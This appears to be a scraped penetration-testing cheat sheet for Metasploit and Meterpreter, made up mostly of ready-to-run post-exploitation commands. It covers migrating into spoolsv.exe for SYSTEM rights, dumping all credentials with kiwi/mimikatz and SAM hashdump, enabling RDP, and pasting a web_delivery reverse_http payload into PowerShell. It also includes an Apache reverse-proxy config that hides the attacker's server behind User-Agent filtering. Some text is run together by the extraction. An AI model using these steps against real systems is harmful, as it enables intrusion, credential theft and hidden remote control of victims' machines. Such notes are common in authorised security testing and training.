1.8 KiB
1.8 KiB
Metasploit
-j
Run job in backgroundsessions -i 1
interactive session 1
Meterpreter
- CheatSheet
- Upgrade shell
post/multi/manage/shell_to_meterpreter
execute
commandsearch
filesdownload
andupload
files
Metasploit after gaining foothold
- Meterpreter shell is opened on target. Run exploit suggester
run post/multi/recon/local_exploit_suggester
- Decide on your exploit and
background
the meterpreter. - Use the exploit.
use <path/to/exploit>
- Fill options like
session
and run the exploit
Privilege Escalation on Windows Using Metasploit
- Find process with higher privs and migrate to it. Example
spoolsv.exe
.
migrate -N spoolsv.exe
- After
NT AUTHORITY\SYSTEM
is gained start mimikatz. and dump all creds
load kiwi
help
creds_all
- Enable RDP via
run post/windows/manage/enable_rdp
Hashdump on Windows
- Meterpreter
run post/windows/gather/hashdump
load kiwi
lsa_dump_sam
Webdelivery
use exploit/multi/script/web_delivery
show targets
set LPORT <attacker-Port>
set PAYLOAD windows/meterpreter/reverse_http
run -j
- Copy into powershell/cmd
Reverse Proxy
- Hide behind reverse proxy, e.g. apache
- In case of an apache, these modules must be enabled
- rewrite
- proxy
- proxy_http
- headers
- Use
User-Agent
to identify targets
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"
ProxyPass "/" "http://localhost:8080/"
<Directory>
AllowOverride All
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>